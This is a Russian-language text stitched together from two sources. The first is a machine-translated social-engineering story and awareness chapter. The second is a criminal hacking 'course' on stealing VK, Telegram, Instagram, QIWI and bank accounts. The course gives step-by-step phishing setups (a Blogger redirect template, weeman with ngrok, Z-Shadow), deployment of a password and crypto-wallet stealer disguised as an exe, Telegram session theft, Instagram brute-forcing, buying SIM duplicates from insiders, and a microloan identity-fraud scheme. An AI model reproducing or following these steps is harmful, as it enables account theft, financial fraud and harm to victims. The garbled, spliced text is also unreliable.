    Джек Доукинс начал свою “профессиональную” карьеру в раннем возрасте в качестве карманного вора, промышляя на спортивных играх на стадионе команды Янки в оживленных помещениях под трибунами и среди ночной толпы туристов на Таймс-Скуэйр. Он так проворно и искусно доказывал что мог снять часы с запястья человека, так что тот даже не узнает. Но в его трудные подростковые годы он рос неуклюжим и не был неуловим. В компании Джувенил Холл(дворец молодежи?)) Джек обучился новому ремеслу с куда меньшим риском быть схваченным.

    Его текущее назначение взывало его получать информацию о квартальном доходе, издержках и финансовом потоке компании до того как эти данные подавались в Комиссию по Обмену и Ценным Бумагам и обнародовались. Его клиентом был дантист, который не хотел объяснять почему он хотел получить информацию. Предусмотрительность этого человека показалась Джеку смехотворной. Подобное он видел и до этого — у парня наверное была проблема с азартными играми, или может недешево обходящаяся любовница, о которой его жена была еще не в курсе. Или может быть он просто хвастался своей жене насчет того, как он умен на фондовой бирже; теперь же он петерял пару пакетов акций и хотел сделать нехилое вложение в нечто более надежное, зная как именно биржевая стоимость компании будет прогрессировать когда они анонсируют квартальные итоги.

    Люди удивляются когда обнаруживают как мало времени требуется социальному инженеру чтобы выяснить как контролировать ситуацию, с которой он прежде никогда не сталкивался. К тому времени как Джек вернулся домой с его встречи с дантистом, у него уже сформировался план.

    Его друг Чарлз Бэйтс работал в компании Панда Импорт, у которой был свой собственный телефонный коммутатор, или PBX.

    В терминах, близких людям, знающим телефонные системы, PBX был подключен к цифровой телефонной службе известной как T1, сконфигурированной как Интерфейс Основного Тарифного плана цифровой сети интегрированных услуг (Primary Rate Interface ISDN(integrated services digital network), PRI ISDN — выделенный канал). Под этим подразумевается, что каждый раз когда звонок исходил от Панда Импорт, установки и другая информация обработки вызова попадали из канала данных в телефонный коммутатор компании; информация включала в себя номер вызывающей стороны, который(если не заблокирован) передавался в устройство caller ID на конце линии получателя.

    Друг Джека знал как запрограммировать коммутатор так, чтобы человек, получающий вызов, видел бы на его caller ID-дисплее не действительный телефонный номер в офисе Панда Импорт, а какой угодно другой номер, который он запрограммировал в коммутатор. Этот трюк работает, поскольку местные телефонные компании не беспокоятся о подтверждении номера вызывающего, полученного от абонента, и сравнении его с действительными телефонными номерами за которые абонент платит.

    Все что Джеку Доукинсу было нужно — это доступ к любому такому телефонному сервису. К счастью, его друг и временами партнер по преступлениям, Чарльз Бэйтс, всегда был рад протянуть руку помощи за соответствующее вознагрждение. В данном случае, Джек и Чарльз временно перепрограммировали телефонный коммутатор так, что звонки с конкретной телефонной линии, проходящей в зданиях Панда Импорт, подменяли бы внутренний телефонный номер Виктора Мартина, делая похожим что вызов идет из авиакомпании Starbeat.

    Идея того, что ваш caller ID может быть изменен для отображения любого желаемого вами номера, так малоизвестна, что редко ставится под вопрос. В данном случае, Линда была счастлива отправить факсом запрошенную информацию парню, который, как она думала, был из рекламного отдела.

    Когда Джек повесил трубку, Чарльз перепрограммировал телефонный коммутатор компании, вернув телефонный номер к исходным установкам. Анализ обмана

    Некоторые компании не хотят чтобы их клиенты или поставщики знали телефонные номера их сотрудников. Например, в компании Ford могут решить, что звонки из их Центра Службы Поддержки Потребителей должны отображать номер 800 для Центра и имя вроде “Поддержка Ford” вместо реального прямого телефонного номера каждого представителя слубы поддержки, осуществляющего звонок. Microsoft может захотеть дать своим сотрудникам возможность говорить людям свой телефонный номер вместо того, чтобы каждый, кому они звонят, кидал взгляд на их caller ID и знал их

    дополнительный код. Таким способом компания способна поддерживать конфиденциальность внутренних номеров.

    Но эта же самая возможность перепрограммирования предоставляет удобную тактику для хулигана, коллекционера счетов, телемаркетолога, и, конечно же, социального инженера.


    Знание об информационной безопасности и тренировки


    Cоциальный инженер задумал заполучить проект (исходники) Вашего нового продукта за 2 месяца до релиза.

    Что остановит его?

    Ваш файервол? Нет.

    Мощная система идентификации? Нет. Система обнаружения вторжений? Нет. Шифрование данных? Нет.

    Ограничение доступа к номерам дозвона модемов? Нет. Кодовые имена серверов, которые затрудняют определение местонахождения проекта искомого продукта? Нет.

    Смысл здесь в том, что никакая технология в мире не сможет противостоять атаке социального инженера.


    Обеспечение безопасности с помощью технологии, тренировки и процедуры


    Компании, которые проводят тесты на возможность проникновения, сообщают, что их попытки проникнуть в компьютерную систему компании с помощью методов социнженерии практически в 100% случаев удаются.

    Технологии безопасности могут усложнить этот тип атак путем исключения людей из процесса принятия решений. Тем не менее истинно эффективный путь ослабить угрозу социальной инженерии можно через использование технологий безопасности, комбинированных с политикой безопасности, которая устанавливает правила поведения служащих, а также включающих обучение и тренировку сотрудников.

    Единственный путь сохранить разработки Вашего продукта нетронутыми — иметь тренированную, знающую и добросовестную рабочую команду. Это подразумевает тренировку с использованием политик и процедур, но, вероятно, более важным является переход к программе распределенной осведомленности. Некоторые компании, занимающиеся вопросами безопасности, рекомендуют тратить на тренировку таких программ до 40% бюджета компании.

    Первый шаг — приучить каждого на предприятии к мысли, что существуют бессовестные люди, которые могут с помощью обмана и психологии манипулировать ими. Служащие должны знать, какая информация нуждается в защите, и как эту защиту осуществлять. Однажды хорошо прочувствовав и поняв, как можно поддаться чужим манипуляциям, они будут находиться в намного более выгодной позиции, чтобы распознать атаку.

    Осведомление о безопасности включает также обучение каждого работающего в компании политикам и процедурам. Как обсуждается в главе 17, политики — это необходимые и обязательные правила, которые описывают поведение сотрудников для защиты корпоративной информационной системы и особо ценной информации.

    Эта и следующая главы показывают безопасный шаблон (blueprint — синька, светокопия), который обезопасит Вас от атак, которые дорого могут Вам обойтись. Если Вы не тренируете персонал, следующий процедурам обработки информации (well— thought —out procedures), это до того момента, пока Вы не потеряете информацию благодаря социальному инженеру. Не тратьте время, ожидая атак, которые могут случиться, пока решаете, разрабатывать или не разрабатывать политики безопасности: они могут разорить Ваш бизнес и разрушить благополучие Ваших рабочих.


    Понимание того, как атакующий может воспользоваться человеческой природой


    Для того, чтобы разработать действенную программу обучения, Вы должны понять, почему люди в первую очередь уязвимы для атак. Для выделения этих тенденций в вашей программе, например, обратить на них внимание благодаря дискуссии — этим Вы поможете сотрудникам понять, как социальный инженер может манипулировать людьми.

    Манипуляция начала изучаться социальными исследователями в последние 50 лет. Robert B. Cialdini, написавший в «Американской науке» (Февраль 2001), объединил результаты этих исследований и выделил 6 «черт человеческой натуры», которые используются в попытке получения нужного ответа.

    Это 6 приемов, которые применяются социальными инженерами наиболее часто и успешно в попытках манипулировать.

    Авторитетность

    Людям свойственно желание услужить (удовлетворить запрос) человеку с авторитетом (властью). Как говорилось раньше, человек получит нужный

    ответ, если сотрудник уверен, что спрашивающий имеет власть или право задавать этот вопрос.

    В своей книге «Влияние» Dr. Cialdini написал об обучении в 3 госпиталях Мидвестерна, в которых аппараты 22 медсестер соединялись с человеком, который выдавал себя за физиотерапевта, инструктируя административный персонал на выписку рецепта препарата (наркотика?) пациенту. Медсестры, которые получили это указание, не знали звонившего. Они не знали, действительно ли он доктор (а он им не был). Они получали инструкции для выписки рецепта по телефону, что нарушает политику безопасности госпиталя. Препарат, который указывался, не разрешен к применению, а его доза составляла в 2 раза большую, чем допустимая суточная норма — все это может опасно отразиться на состоянии здоровья пациента или даже убить его. Более чем в 95% случаев Cialdini сообщает, что «медсестра брала необходимую дозу из палаты с медикаментами и уже была на пути к палате указанного пациента», где перехватывалась наблюдателем, который сообщал ей об эксперименте.

    Примеры атак:

    Социнженер пытается выдать себя за авторитетное лицо из IT департамента или должностное лицо, выполняющее задание компании.

    Умение расположить к себе

    Люди имеют привычку удовлетворить запрос располагающего к себе человека, или человека со сходными интересами, мнением, взглядами, либо бедами и проблемами.

    Примеры атак:

    В разговоре атакующий пытается выяснить увлечения и интересы жертвы, а потом с энтузиазмом сообщает, что все это ему близко. Также он может сообщить, что он из той же школы, места, или что-то похожее. Социальный инженер может даже подражать цели, чтобы создать сходство, видимую общность.

    Взаимность

    Мы можем машинально ответить на вопрос, когда получаем что-то взамен. Подарком в этом случае может служить материальная вещь, совет или помощь. Когда кто-то делает что-то для нас, мы чувствуем желание отплатить. Эта сильная черта человеческой натуры проявляется тогда, когда получивший подарок не ждал (не просил) его. Один из самых эффективных путей повлиять на людей, чтобы получить благосклонность (расположить к себе, а, следовательно, получить информацию) — преподнести неявно обязывающий подарок.

    Поклонники религиозного культа Хари Кришны очень опытны в умении получать влияние над человеком путем преподнесения подарка — книги или цветка. Если человек пробует вернуть, отказаться от подарка, дарящий мягко

    настаивает: «Это наш подарок Вам». Этот основной принцип взаимности использовался Кришнами для постоянного увеличения пожертвований. Примеры атак:

    Сотрудник получает звонок от человека, который называет себя сотрудником IT департамента. Звонящий рассказывает, что некоторые компьютеры компании заражены новым вирусом, который не обнаруживается антивирусом. Этот вирус может уничтожить (повредить) все файлы на компьютере. Звонящий предлагает поделиться информацией, как решить проблему. Затем он просит сотрудника протестировать недавно обновленную утилиту, позволяющую пользователю сменить пароли.

    Служащему неудобно отказать, потому что звонящий лишь предлагает помощь, которая защитит пользователей от вируса. Он хочет отплатить, сделав что-нибудь для «доброго человека». Например, ответить на пару вопросов…

    Ответственность

    Люди меют привычку исполнять обещанное. Раз пообещав, мы сделаем все, потому что не хотим казаться не заслуживающими доверия. Мы будем стремиться преодолеть любые препятствия для того, чтобы сдержать слово или выполнить обязанность.

    Примеры атак:

    Атакующий связывается с подходящим новым сотрудником и советует ознакомиться с соглашением о политиках безопасности и процедурах, потому что это — основной закон, благодаря которому можно пользоваться информационными системами компании. После обсуждения нескольких положений о безопасности атакующий просит пароль сотрудника «для подтверждения согласия» с соглашением. Он должен быть сложным для угадывания. Когда пользователь выдает свой прароль, звонящий дает рекомендации, как выбирать пароли в следующий раз, чтоб взломщикам было сложно подобрать их. Жертва соглашается следовать советам, потому что это соответствует политике компании. К тому же рабочий предполагает, что звонивший только что подтвердил его согласие следовать соглашению. Социальная принадлежность к авторизованным

    Людям свойственно не выделяться в своей социальной группе. Действия других являются гарантом истинности в вопросе поведения. Иначе говоря,

    «если так делают другие, я тоже должен действовать так».

    Примеры атак:

    Звонящий говорит, что он проверяющий и называет имена других людей из департамента, которые занимаются проверкой вместе с ним. Жертва верит, потому что остальные названные имена принадлежат работникам департамента. Затем атакующий может задавать любые вопросы, вплоть до того, какие логин и пароль использует жертва.

    Ограниченное количество «бесплатного сыра»

    Еще одна из потенциально опасных для безопасностии информации человеческих черт — вера в то, что объект делится частью информации, на которую претендуют другие, или что эта информация доступна только в этот момент.

    Примеры атак:

    Атакующий рассылает электронные письма, сообщающие, что первые 500 зарегистрировавшихся на новом сайте компании выиграют 3 билета на примьеру отличного фильма. Когда ничего не подозревающий сотрудник регистрируется на сайте, его просят ввести свой адрес электронного почтового ящика на рабочем месте и выбрать пароль. Многие люди, чтоб не забыть множество паролей, часто используют один и тот же во всех системах. Воспользовавшись этим, атакующий может попытаться получить доступ к целевому рабочему или домашнему компьютеру зарегистрировавшегося.


    Типичные методы действий социальных инженеров

Известна только людям, которым необходимо это знать внутри организации. Подтвердите личность звонящего и спросите у владельца, надо ли звонящему это знать. Отпускайте только с письменным разрешением менеджера, владельца или создателя. Убедитесь, что просителя подписал договор о неразглашении тайн. Только менеджеры могут сообщать что-либо людям, не работающим в фирме.

Всем салют! Сегодняшняя наша лекция посвящена социальной сети Вконтакте и взлому учетных записей пользователей ее же.



image


Мы составили для Вас список методов, которые помогут вам завладеть чужой учеткой. Давайте пробежимся по каждому из них, а затем разберем самые оптимальные способы и выберем, какой же подойдет именно вам в конкретной ситуации.


 

Обзор


Фишинг

Наверное, самый распространённый метод взлома страниц в социальных сетях.

Суть заключается в создании идентичной по структуре и дизайну страницы, на которой сайт запрашивает логин и пароль. Когда они введены, данные отправляются прямиком в наши руки.


Кейлоггер (клавиатурный шпион)

Этот метод, наверное, самый простой из всех. И к тому же, самый действенный, каким бы опытным не был пользователь, обнаружить кейлоггер, не проводя целенаправленно его поиск – невозможно.

Устанавливаем кейлоггер на компьютер жертвы, наше ПО начинает записывать абсолютно всё, что вводится на клавиатуре, и отправляет эти данные нам. Причём нам даже не обязательно иметь доступ к компьютеру, чтобы установить подобную программу. Достаточно лишь заставить жертву запустить файл, который мы ей отправим, завернув в заманчивую и красивую обертку.

Конечно, опытный пользователь не станет запускать неизвестные программы, полученные непонятно от кого, но не стоит забывать, что у всех нас есть родственники, друзья, которые с удовольствием запустят файл с

названием «photo.exe» или что-то в этом роде. А так же о том, что мы можем вшить наше ПО в вполне себе безобидную программу.


Стиллер

Многие люди используют такую функцию в браузере, как «запомнить

пароль». Это позволяет им не вводить пароль каждый раз при входе в свой аккаунт. Это довольно опасно для жертвы и опять же, прекрасно для нас.

Устанавливаем на компьютер программу, которая будет брать данные из из всех браузеров и отправлять их нам.


Взлом мобильного телефона

Ввиду того, что многие люди используют свои телефоны для того, чтобы заходить в свои социальные сети, взломать их становится проще. Если мы

каким-либо образом можем получить доступ к телефону жерты, то сможем получить доступ и к ее страничке ВКонтакте, банку и куче других,

потенциально интересных нам вещей. Существует много различных

инструментов и приложений для отслеживания чьего-то смартфона. К примеру, Spy Phone Gold и Mobile Spy.


Дубликат СИМ-карты

Самый действенный способ, но требует затрат (Если вы, конечно, не работник одного из сотовых операторов). Стоит нам создать дубликат СИМ-

карты и можно считать, что все акки жертвы уже у нас. Стоит такая услуга от 1 до 3к рублей и выполняется сотрудниками-крысами в стане оператора.


Самый опасный способ с точки зрения преследования по закону. Но самый простой в реализации. Если кто-то из вас все же решится, то

предоставим по запросу контакты исполнителя. Его лучше использовать для интернет-банкинга, например. Когда на кону большие суммы денег.

Лучше все делать не в своем городе. Телефон, ноут (если задействован) – в утиль сразу же после окончания.

Метод подделки DNS

Метод будет работать только в ситуации, когда жертва и мы находимся в одной и той же сети. Этот способ позволяет нам создать фейковую страницу авторизации, и, как результат, получить данные, введённые пользователем и, следовательно, доступ к его странице.


 

К оружию!


image


Давайте рассмотрим, как создать фишинговый сайт ВК (по аналогии, подойдет так же и для других соц.сетей и т.д.)


Мы подготовили для вас уже настроенные скрипты страницы входа. (будет приложено к лекции).


Все, что вам остается – это залить готовый скрипт на хостинг и гнать на него жертву.


Могу от себя посоветовать несколько хостингов: https://www.000webhost.com/ - совершенно бесплатный хостинг. https://www.host-food.ru// - стабильный и очень дешевый (Иногда администрация может банить, если будут жалобы)

К сожалению вк не пропускает подозрительные ссылки, даже если они предварительно сокращёны.

Поэтому делаем редирект и прогоняе ссылку на наш сайт через blogger.com:

1. Регистрируемся 2.Создаём новый блог

  1. в управлении блогом нажимаем изменить HTML

  2. Стираем всё и вставляем это:


    <?xml version="1.0" encoding="UTF-8" ?>

    <!DOCTYPE html>

    <html b:css='false' b:defaultwidgetversion='2' b:layoutsVersion='3' b:responsive='true' b:templateUrl='indie.xml' b:templateVersion='1.1.1' expr:dir='data:blog.languageDirection' xmlns='https://www.w3.org/1999/xhtml' xmlns:b='https://www.google.com/2005/gml/b' xmlns:data='https://www.google.com/2005/gml/data' xmlns:expr='https://www.google.com/2005/gml/expr'>

    <meta content='0; url= ' https-equiv='Refresh'/>

    <head>

    <b:skin version='1.1.0'><![CDATA[

    ]]></b:skin>

    </head>

    <body>

    <b:section class='footer' id='footer' name='Footer' showaddelement='false' tag='footer'/>

    </body>

    </html>


    *где URL вставляем ссылку на наш фишинг сайт

  3. сохраняем

  4. Копируем ссылку на наш блог и уже после всего проделанного сокращаем через vk.cc


Готово!

image


Тут трудностей не возникнет, если только кто-то из вас не пропускал лекции

Используем уже изученный нами sAINT.



image


image


image image


image


image


Функционал:

Стиллер сохраненных паролей, cookies, автозаполнений из браузеров:


Стиллер криптокошельков:

Anoncoin, Armory, BBQcoin, Bitcoin Core, Bytecoin, Craftcoin, DashCoin, Devcoin, Digitalcoin, Electrum, Fastcoin, Feathercoin, Florincoin, Franko, Freicoin, GoldCoin, I0coin, Infinitecoin, Ixcoin, Junkcoin, Litecoin, Luckycoin, Megacoin, Mincoin, Monero, MultiBit, Namecoin, NovaCoin, Phoenixcoin, PPCoin, Primecoin, ProtoShares, Quarkcoin, Tagcoin, Terracoin, Worldcoin, Yacoin, Zetacoin


Стиллер переписки из Skype

Стиллер куки-файлов Telegram, по которомы можно попасть на аккаунт Стиллер файлов клиента Steam (ssfn+vdf)

Возможность сделать снимок экрана в процессе работы стиллера (screenshot)


Мощный граббер файлов:


Установка:


Проходим регистрацию на хостинге Sweb


Сразу говорю, хостинг бесплатный, точнее с тест периодом, просто читайте и смотрите внимательно !

image

Дальше все стандартно, пишем почту, вводим каптчу, регистрируем аккаунт..

После регистрации на почту придет письмо, где будут данные для входа в панель управления и FTP

image


Качаем Filezilla, вводим Ip адрес сервера, логин, пароль и подключаемся к серверу.. Сворачиваем Filelzilla (не закрываем и идем дальше )

Переходим на хостинге в панеле управления в раздел Базы MYSQL. Создаем базу, придумываем пароль ( логин дан по умолчанию ), далее нажимаем сюда

image


вводим придуманный вами пароль от базы..

Далее просто открываем папку со стиллером, переходим в папку panel - panel - info и копируем файл dump.sql на рабочий стол.

Возвращаемся на хостинг, Нажимаем "импорт" - выбираем нашу базу ( dump.sql ) и загружаем

image

Далее качаем Notepad ++ , переходим в папку со стиллером, находим файл index.php , открываем его через Notepad ++ , и прописываем имя базы 9 совпадает с базой ) и пароль от базы , как на скрине

image

Дальше открываем нашу настроенную Filezill-у , нажимаем на папку publik_html и перетаскиваем

файлы стиллера на хост, в точности как на скрине:

image

Осталось совсем немного, на пути к успеху. Переходим на нашу почту, открываем письмо от хостинга, находим тестовый домен, который они предоставили:

image


Далее пишем ссылку: Ваш Домен/panel/admin.php , вставляем ее в браузер и попадаем на админ панель вашего стиллака.. Вводим пароль ( редактируется в index.php, забыл упомянуть, на скрине видно ) и заходим в админку.

Ставим все галочки , Настраиваем граб файлов с рабочего стола, все как на скрине

image

Открываем билдер и прописываем ссылку: https://Вашдомен/index.php . Далее ваш билд добавится в папку с билдером. Если выскочит такая ошибка:


image

ничего страшного , просто закройте.


Далее заходим в папку с билдером, и находим там непонятный файл с названием bin. Открываем свойства файла и дописываем расширение, что бы получилось bin.exe. Это и есть Ваш вирус, открыв который жертва нарвется на вашу ярость и мощь !

Всем салют!


Сегодня речь пойдет о Telegram и Instagram.


image


 

Telegram

Акк от телеги мы можем увести следующими способами из прошлой лекции:


  1. Стиллер, используя Azorult, TeleShadow 2.


    Пройденный нами Azorult обладает нужной нам опцией (Cтиллер куки- файлов Telegram, по которомы можно попасть на аккаунт).


    *Как вы понимаете, для этого способа у человека на ПК должна быть установлена прилага Telegram Desktop.


    Есть вариант перехвата сессии используя TeleShadow 2, он более простой и делает все ровно так же. Рассмотрим его ниже


  2. Дубликат симки.

    *Нужно знать номер телефона жертвы, что далеко не всегда возможно.


  3. Взлом протокола связи SS7.

Грубо говоря, перехват сигнала базовой станции оператора. Все инфу поступающую на телефон можно перехватить, даже звонки.


*Данный метод мы рассматривать не будем из-за его сложности. Возможно в будущем сделаем отдельный курс на эту тему.

TeleShadow 2. Руководство.


Перехват телеграмм сессии еще никогда не был так прост в реализации, прога очень проста и эффективна.


Главные достоинства данного ПО:



Вот так выглядит наш стиллер. Первое, что нас заинтересует:

Transport Type – это то, как будет происходить доставка данных нам. Тут два варианта:

  1. Телеграм апиай – используя бота, будет идти прямо в наш телеграм.

    *Чтобы получить идентификатор пользователя (свой) или GroupChat, просто отправьте /my_id в телеграмм бота @get_id_bot.


  2. SMTP – используя электронную почту.


    Fake Message – то, что будет выскакивать у жертвы при запуске стиллера.

    Icon – иконка стиллера

    Когда ввели все данные – жмем Build и генерируем наш стиллер.


    Взлом Instagram


    Фишинг

    Используем сайт Z-Shadow, что бы не заморачиваться с хостингом и прочим.


    Шаг 1: Создайте аккаунт на z-shadow.info

    image


    Шаг 2: После регистрации ваш аккаунт будет выглядеть примерно, как на изображении ниже.


    image

    Шаг 3: Листайте вниз и выберите страницу номер 3 > Number 35 (Instagram) > Нажмите «English» > Нажмите Ctrl + C (чтобы скопировать ссылку)


    image


    Шаг 4: Откройте новое окно и нажмите Ctrl + V, чтобы вставить ссылку в URL- пространство.


    image

    Как просмотреть взломанные никнеймы и пароли

    Для того, чтобы увидеть количество взломанных жертв, вернитесь на домашнюю страницу вашего аккаунта и обновите «Total Victim» под

    фотографией вашего профиля. Нажмите на вкладку My Victims в верху страницы, затем нажмите Продолжить.


    image

    Теперь взлом паролей и аккаунтов Инстаграм выглядит веселым и простым занятием, не так ли?Как это работает? Просто скопируйте ссылку из третьего шага и отправьте ее по whatsapp или СМС, уговаривая вашу цель нажать на нее. Поздравляем, вы взломали ваш первый Инстаграм аккаунт сегодня.


    Брутфорс


    Сразу предупреждаю, что этот метод атаки простой, но занимает много времени


    Шаг 1: Загрузите эту программу https://github.com/Ethical- H4CK3R/Instagram.git из git-репозитория на ваш компьютер. Так, как показано на рисунке ниже.

    image


    Далее, вам нужно распаковать файл, для этого откройте окно терминала и напишите следующую команду: chmod –R 755 Instagram && cd Instagram


    imageШаг

    2: Выполняем программу. Для того, чтобы открыть программу, напишите команду ls, чтобы увидеть, что находится внутри папки.

    imageДалее, запустите программу

    Instagram.py, набрав команду в терминале python Instagram.py. Вы получите сообщение об ошибке, не волнуйтесь.

    Это произошло, потому что мы не предоставили программе текстовый файл. Так как это программа использует брутфорс метод для взлома Инстаграма, то нам необходимо предоставить словарь, чтобы программа могла им воспользоваться.


    Шаг 3: Получаем текстовый файл. Для этого загуглите «daniel miessler passwords github» и выберите первый результат. Прям как на скриншоте ниже.

    image

    image

    Перейдите в папку Passwords и выберите один из текстовых файлов, в котором не менее 10 миллионов паролей. Чем больше, тем лучше.


    Для того, чтобы сохранить файл, скопируйте пароли в текстовый редактор и сохраните с разрешение .txt в Instagram папку, которая должна находиться в домашней директории.


    Шаг 4: Время взломать Инстаграм аккаунт. Откройте терминал и напишите следующую команду: cd Instagram. В соответствующей папке напишите команду ls, чтобы убедиться, что текстовый файл находится в нужной папке.

    Для того, чтобы выполнить программу напишите:

    Python Instagram.py Username Thetextfile.txt


    image

    С этого момента брутфорс атака началась. В терминале будет отображаться номер попытки и текущий пробный пароль.


    Если вы получаете ошибки, такие как Core.tor, импортируйте TorManager, затем установите механизацию с помощью:

    pip install mechanize, установите запросы с: pip install request,

    установите Tor с помощью: sudo apt-get install tor

    Всем привет!

    Сегодня поговорим о QIWI и о крутом бонусе, который мы подготовили для вас.


    image


    QIWI

    Т.К. на Киви сейчас используется двухвакторная аутентификация посредством SMS, то способов завладеть чужим баблишком становится меньше. Но все же они есть


    Первый способ – дубликат сим-карты. Опасный и действенный.


    Второй способ интереснее и охват аудитории у него очень большой, т.к. работать мы будем не по одному человеку, а сразу по сотням и тысячам (тут нужна СИ, что бы привлечь аудиторию):


    Фишинг сайт с использованием QIWI API


    QIWI API – позволит нам вывести все деньги с кошелька жертвы, через ее токен.


    Вот так выглядит фишинг сайт:

    image


    Сайт будет приложен к лекции.


    Регистрацию хостинга и установку на него сайта мы подробно рассматривали в лекции по ВК, повторяем те же шаги, но заливаем этот сайт, вместо фейк сайта ВК.


    Токены, которые введут жертвы будут сохранятся в файл

    data/data.php


    Что делать с полученным токеном?

    - Об этом мы рассказывали в нашей статье, дублируем:


    Понадобится Python 3,6 (если нету, то устанавливаем).


image

Готово!


!БОНУС!

Т.К. ВЫ ПРОШЛИ УЖЕ ВСЕ РАЗДЕЛЫ И ТЕПЕРЬ МЫ ОБСУЖДАЕМ СПОСОБЫ ЗАВЛАДЕТЬ ЧУЖИМИ ДЕНЬГАМИ, ТО СПЕШИМ ПОДЕЛИТЬСЯ С ВАМИ СУПЕР-КРУТОЙ СХЕМОЙ, КОТОРАЯ НИГДЕ НЕ СВЕТИЛАСЬ И РАЗВОД НИКТО И НЕ ПОЙМЕТ, ДО ПОРЫ ДО ВРЕМЕНИ . ПОГНАЛИ!


ПЕРВОЕ, С ЧЕГО СТОИТ НАЧАТЬ – УРОВЕНЬ БЕЗОПАСНОСТИ. «РЕЖИМ БОГА». ОБЯЗАТЕЛЕН! ПОЖАЛУЙСТА, НЕ ДЕЛАЕТЕ НИ ОДНОГО ДЕЙСТВИЯ, ОПИСАННОГО ДАЛЕЕ, НЕ ВКЛЮЧИВ ЕЕ.

  1. РАСКИДЫВАЕМ ОБЪЯВЛЕНИЯ НА САЙТАЙ ВАКАНСИЙ (ДЕЛАЕМ САЙТ САМИ ТЕМАТИЧЕСКИЙ, ОБЪЯВЛЕНИЯ В ТЕЛЕГРАММ БОРДАХ, СОЗДАЕМ КАНАЛ ПО ЗАРАБОТКУ И Т.Д.)

  2. МЫ ИЩЕМ ЛЮДЕЙ, КОТОРЫЕ ГОТОВЫ БУДУТ ПРИНЯТЬ ЗАЛИВЫ ДЕНЕЖНЫХ СРЕДСТВ НА СВОЮ БАНКОВСКУЮ КАРТУ (ЗА ПРОЦЕНТ). НЕ ЖАДНИЧАЕМ, СТАВИМ СТАВКУ 50%. ИСПОЛЬЗУЯ СИ РАССКАЗЫВАЕМ ЖЕРТВЕ ПРО ФИРМУ И ПРО ТО, ЧТО НУЖНО СРОЧНО ВЫВЕСТИ СВОИ АКТИВЫ ИЗ НЕЕ И ТД И ТП.



    image


    image


    image ОТ НЕЕ

    НА ДАННОМ ЭТАПЕ ВЫ НАВЕРНЯКА НЕ ПОНИМАЕТЕ, А В ЧЕМ НАША ВЫГОДА, ЗАЧЕМ НАМ ДЕЛИТЬСЯ?!


    А ДЕЛИТСЯ МЫ И НЕ БУДЕМ. ДЕЛИТСЯ БУДЕТ ЖЕРТВА, С НАМИ. НО ОНА ЭТОГО ЕЩЕ ДОЛГО НЕ УЗНАЕТ.


  3. После того, как нашли жертву. Просим у нее номер карты, что бы перевести средства. А так же паспортные данные, что бы нас не кинули. Этим и аргументируем. Все, как правило соглашаются, потому что понимают, что нам нужны гарантии.


  4. Когда у нас на руках номер карты жертвы, ее паспортные данные – можно приступать!

Только не забудь левый телефон и левую симки из нашей самой первой лекции по безопасности и анонимности!

Идем на сайты микрозаймов и берем их на паспортные данные жертвы. (Берем немного 3-10к за раз)

*Паспортные данные – жертвы

*Номер карты – жервы! Обязательно!

*Номер телефона – наш, т.к. из микрофинансовых организаций будут звонить или слать смс.

*Что бы жертва не удивлялась – предупреждаем, что оговоренная сумма будет поступать маленькими частями в течении суток.

*Жертва нужна без непогашенных кредитов, иначе займ не факт, что дадут.

Что мы имеем далее:

  1. Жертва действительно получает условные 100к на карту

  2. Радуется, что ее не кинули, думает о самых легких деньгах в своей жизни.

  3. Естественно, в надежде на дальнейшее сотрудничество, жертва переводит нам наши 50%.

  4. Мы счастливы, жертва тоже счастлива (пока не узнает о долгах, через дней 30)

Всем привет, друзья! Сегодня рассмотрим Сбербанк онлайн и Я.Деньги


image


Фишинг.


Для разнообразия мы решили дать вам инструкцию, как провернуть все это прямо на телефоне!)


Но обращаем внимание, что это ПО работает на Кали линукс и соответсвенно спокойно используется в нем, инструкции не отличаются вообще никак.

Погнали!


Для фишинга мы будем использовать программу для kali linux -

weeman.


Для запуска weeman на вашем устройстве мы будем использовать консоль termux.


image

Многие называют Termux лучшим эмулятором linux, солидарен. Скачиваем и открываем. Для удобства использования терминала

советую скачать дополнительную клавиатуру Hacker's Keyboard, позже поймёте для чего.


image

Начинаем подготовку к установке, вводим в консоль последовательно две команды:


$ apt update

$ apt install


Эта операция может занять некоторое время, зависит от скорости интернета.

Далее:


$ apt install git

image

Появляется вопрос "Do yo want to contiune? [Y/n]". Да, мы желаем продолжить, вводим маленькую "y" (это значит yes).

Следующая команда:


$ apt install python2


Снова появиться вопрос "Do yo want to contiune? [Y/n]". Поступаем аналогично.

Этой командой мы установили python (язык программирования), на котором написан weeman.

Готово, мы установили все, что требуется для запуска weeman. Скачаем weeman:


$ git clone https://github.com/evait-security/weeman

Отлично, пропишем команду:


$ ls


Она выводит содержимое каталогов.

image

Если после этой команды у Вас ничего не появилось в консоли, то попробуйте повторить пункты вверху.

Если все так же как у меня, то продолжим:


$ cd weeman

$ ls

image

Появились эти файлы. Запускаем weeman:


$ python2 weeman.py

image

У нас получилось, установка прошла успешно и мы запустили weeman. Что бы вывести в консоль помощь по командам пишем:


$ help

image

Теперь надо поставить некоторые настройки (на примере Яндекса).

Введём следующие команды:


$ set url https://yandex.ru

$ set port 8080

$ set action_url https://yandex.ru


Первой командой мы установили адрес сайта, который мы хотим скопировать.

Второй командной установливаем порт.

Третья команда определяет адрес на который будет кидать человека, предоставившего свои данные

Прописываем show, проверяем правильность установленных настроек:


$ show

image

Все верно, продолжаем:


$ run


Все, готово. Сервер запущен, вот его адрес

image

Копируем "https://localhost:8080" и вводим в браузер, но на телефоне (Сейчас этот сервер локальный и существует только на вашем устройстве)

image


image

Сайт существует пока только у нас и зайти в него можем только мы и люди, находящиеся с нами в одной сети. Как вывести его в интернет?


- используем ngrok (бесплатен)


Cкачиваем версию для Kali https://ngrok.com/download


Следуем инструкции, состоящей из 4 шагов. Бинго! Мы вывели наш локальный сайт в сеть интернет.


Аналогичными действиями мы можем получить логин и пароль не только Сбербанк онлайн, но и Я. Деньги.


Прошу заметить, что и Сбер и Яндекс работают с смс- подтверждением. Поэтому атаку нужно выполнять на конкретную жертву, которая естественно обладает той сумой, ради которой стоит все это проделывать.

 

  1.   Собираем все данные

  2.   Узнаем номер телефона

  3.   Выуживаем логин и пароль способом выше, либо стиллерами, о которых   говорилось  ранее.

  4.   Делаем дубликат симки.

  5.   Снимаем деньги и уходим в закат.

 

Если Вы имеете что мне сказать, то пишите на мыло:  oume@protonmail.com